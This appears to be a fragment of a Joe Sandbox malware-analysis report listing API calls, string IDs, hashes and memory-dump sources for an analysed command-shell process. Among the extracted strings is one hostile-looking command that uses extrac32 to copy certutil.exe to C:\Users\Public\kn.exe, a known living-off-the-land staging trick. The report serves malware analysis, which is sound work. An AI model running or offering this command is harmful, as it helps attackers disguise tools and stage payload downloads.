                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$_wcsicmp$AllocProcess
                                                                                          • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                          • API String ID: 3223794493-3086019870
                                                                                          • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                          • Instruction ID: d44af1d4b106c26246e8a6b2118a17f0ba545764a7c632e7856fd4c84161ac27
                                                                                          • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                          • Instruction Fuzzy Hash: AF51C475A0AB83A5FB188B25A8502797BF0FF59B50F588535C91E833A1DF3DE445E310
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                          • API String ID: 0-3124875276
                                                                                          • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                          • Instruction ID: 688bbc1488090e5adb3b050f572713c27a53eea7792caa7789906e93abbb11f3
                                                                                          • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                          • Instruction Fuzzy Hash: BF518C70A0F643A6FB149F20A4142B86BE5BF59B85F548039DA0EC63E5DF3CA849B350
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6A0E9C6DB), ref: 00007FF6A0E858EF
                                                                                            • Part of subcall function 00007FF6A0E8081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6A0E8084E
                                                                                          • towupper.MSVCRT ref: 00007FF6A0E9C1C9
                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E9C31C
                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF6A0E9C5CB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                          • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                                                          • API String ID: 2242554020-619615743
                                                                                          • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                          • Instruction ID: 56f9484c40c40ceec7c6b0807a4b4c3d7668503b0554bbb665c9d023967bc7fe
                                                                                          • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                          • Instruction Fuzzy Hash: 5312F831A0A753A1EA64EB25A40417AA7A0FF45BE0F544336DA6EC37E1DF3CE545E700
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00007FF6A0E87013
                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E87123
                                                                                            • Part of subcall function 00007FF6A0E81EA0: wcschr.MSVCRT(?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6A0EA0D54), ref: 00007FF6A0E81EB3
                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E8706E
                                                                                          • wcsncmp.MSVCRT ref: 00007FF6A0E870A5
                                                                                          • wcsstr.MSVCRT ref: 00007FF6A0E8F9DB
                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E8FA00
                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E8FA5F
                                                                                            • Part of subcall function 00007FF6A0E8823C: FindFirstFileExW.KERNELBASE ref: 00007FF6A0E88280
                                                                                            • Part of subcall function 00007FF6A0E8823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E8829D
                                                                                            • Part of subcall function 00007FF6A0E83A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6A0E9EAC5,?,?,?,00007FF6A0E9E925,?,?,?,?,00007FF6A0E7B9B1), ref: 00007FF6A0E83A56
                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E8FA3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                          • String ID: \\.\
                                                                                          • API String ID: 799470305-2900601889
                                                                                          • Opcode ID: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                          • Instruction ID: de600996922136b9a51518139ff5f9076835da9245f7954bdafa17b165c09e2e
                                                                                          • Opcode Fuzzy Hash: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                          • Instruction Fuzzy Hash: CA510732B0BA83E5EB608F20E8442B977A0FF89B95F595435DA4E87B94DF3CD4499300
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                          • String ID:
                                                                                          • API String ID: 1944892715-0
                                                                                          • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                          • Instruction ID: f27df09f70129af64119d30d6957277af660f08c295208c84af130852cdf283d
                                                                                          • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                          • Instruction Fuzzy Hash: E2B1A171A0B783A6EB609F11A954179B6A1FF69B81F548435CA4EC73D2EF3CE444E310
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E83578: _get_osfhandle.MSVCRT ref: 00007FF6A0E83584
                                                                                            • Part of subcall function 00007FF6A0E83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E8359C
                                                                                            • Part of subcall function 00007FF6A0E83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835C3
                                                                                            • Part of subcall function 00007FF6A0E83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835D9
                                                                                            • Part of subcall function 00007FF6A0E83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835ED
                                                                                            • Part of subcall function 00007FF6A0E83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E83602
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E754DE
                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF6A0E71F7D), ref: 00007FF6A0E7552B
                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF6A0E71F7D), ref: 00007FF6A0E7554F
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E9345F
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6A0E71F7D), ref: 00007FF6A0E9347E
                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6A0E71F7D), ref: 00007FF6A0E934C3
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E934DB
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6A0E71F7D), ref: 00007FF6A0E934FA
                                                                                            • Part of subcall function 00007FF6A0E836EC: _get_osfhandle.MSVCRT ref: 00007FF6A0E83715
                                                                                            • Part of subcall function 00007FF6A0E836EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6A0E83770
                                                                                            • Part of subcall function 00007FF6A0E836EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E83791
                                                                                          Similarity
                                                                                          • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                          • String ID:
                                                                                          • API String ID: 1356649289-0
                                                                                          • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                          • Instruction ID: 8b21abd75195a1ec1b3c1c83c39120cb1d2fa2668fc59ec8e9fc465157b97cef
                                                                                          • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                          • Instruction Fuzzy Hash: 01918432A0A643A7EB249F25E400179F7E1FB89B95F554139DA4E83B95DF3CD444DB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                          • String ID: %s$/-.$:
                                                                                          • API String ID: 1644023181-879152773
                                                                                          • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                          • Instruction ID: c90b77946093ed0a62fd9608ecb1794cd83d947e291c71511e8aea78889d9121
                                                                                          • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                          • Instruction Fuzzy Hash: 9A91C332A0A683A5EB649B64D5402BEA3A0FF84BC4F944536DA4EC37E5DF3CE545E310
                                                                                          APIs
                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6A0E97251), ref: 00007FF6A0E9628E
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: ObjectSingleWait
                                                                                          • String ID: wil
                                                                                          • API String ID: 24740636-1589926490
                                                                                          • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                          • Instruction ID: a0eb131649ac1e2741cafb80f6fe0d69fb053487fc8dc786e73e7085e1ab581b
                                                                                          • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                          • Instruction Fuzzy Hash: 0F413031A0A643A3F7608B25E44027AA6A1FFC67C1F649132E92DC6BD4DF7DE845A701
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                          • String ID: $Application$System
                                                                                          • API String ID: 3377411628-1881496484
                                                                                          • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                          • Instruction ID: 2a4dc7fac50ed1507ca2ed8cef443dd77f3d9b12d046da0ded3557cb51d3352c
                                                                                          • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                          • Instruction Fuzzy Hash: 11414872B09B42AAE7209B60E4403ED77B5FB89749F545136EA4E83B98EF3CD145C740
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                          • String ID: :$\
                                                                                          • API String ID: 3961617410-1166558509
                                                                                          • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                          • Instruction ID: 2264c39bac29fb975f1600371809a4eb1706ec8d14c398e4016747575c2a893d
                                                                                          • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                          • Instruction Fuzzy Hash: E121C432A0D743A6EB148B74A444079B6A1FFCDB95B588271EA0FC3790EF3CD4489601
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                          • String ID:
                                                                                          • API String ID: 1397130798-0
                                                                                          • Opcode ID: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                                          • Instruction ID: 60f8514bd1aeebbaf22c9cab85ddee2eac99c6b10e0f45ab367bec43a5b15a46
                                                                                          • Opcode Fuzzy Hash: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                                          • Instruction Fuzzy Hash: AB919832B0A783A6FB658B11D4402B9B3A1FF88B85F598135DA8E87795DF3CD544E700
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806D6
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806F0
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E8074D
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E80762
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E825CA
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E825E8
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E8260F
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E82636
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E82650
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp$Heap$AllocProcess
                                                                                          • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                          • API String ID: 3407644289-1668778490
                                                                                          • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                          • Instruction ID: 63e158f1a6b2e493dea714cb79fbdd183697de8c80dabeb9cf08d5df6d504552
                                                                                          • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                          • Instruction Fuzzy Hash: 0F313071A1E603A6F7105F21E8113796AA5BF99B81F548439DA0EC63E5EF3CE408F711
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                          • API String ID: 2516562204-381716982
                                                                                          • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                          • Instruction ID: 03eade065005e565545f7eef0fff0d0e433fa55bb52eae43a87d5c186de7d754
                                                                                          • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                          • Instruction Fuzzy Hash: B4C1AF32B066529AEB648F25E84027EB7B0FB48B95F545135EE8D93B94DF3CE490E700
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D46E
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D485
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D4EE
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: iswspace.MSVCRT ref: 00007FF6A0E7D54D
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D569
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D58C
                                                                                          • iswspace.MSVCRT ref: 00007FF6A0E87EEE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                          • String ID: A
                                                                                          • API String ID: 3731854180-3554254475
                                                                                          • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                          • Instruction ID: e2cd61ade22bafa0c19ae0d6180be8071a37c40e5249fd312e4577070c3299e5
                                                                                          • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                          • Instruction Fuzzy Hash: DEA18E32E0B783AAE7609B61A440279B7A0FF89790F548035DA9DC77A5EF3CE445E700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                          • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                          • API String ID: 1580871199-2613899276
                                                                                          • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                          • Instruction ID: e9f8530b274019a13c35c1d07dc104d13467a953543a16a76a193cc375f59e8d
                                                                                          • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                          • Instruction Fuzzy Hash: 86519F72B1AB8392EB508B25E800279B7B4FF88B85F595135EA5E83B94DF3CE411D740
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                          • String ID: con
                                                                                          • API String ID: 689241570-4257191772
                                                                                          • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                          • Instruction ID: 0274006f04b32b81adcb5aafb63e4506b0273c94bc1ca12cc19a4808e3261c44
                                                                                          • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                          • Instruction Fuzzy Hash: 5541C436A0974697E3108F259484379BAA1FB8DBA5F648334DE6D833D4DF3CD8499780
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                          • String ID: PE
                                                                                          • API String ID: 2941894976-4258593460
                                                                                          • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                          • Instruction ID: 658ba53696c449f393504f4727f5440a95b31446592d24778806714ab9b0308b
                                                                                          • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                          • Instruction Fuzzy Hash: D9418E71609793A6EA208B11E41027AFBA0FF89BD1F484231EE9D83B95DF3CE455DB40
                                                                                          APIs
                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6A0E9849D,?,?,?,00007FF6A0E9F0C7), ref: 00007FF6A0E80045
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6A0E9F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E80071
                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E80092
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6A0E800A7
                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E80148
                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6A0E80181
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
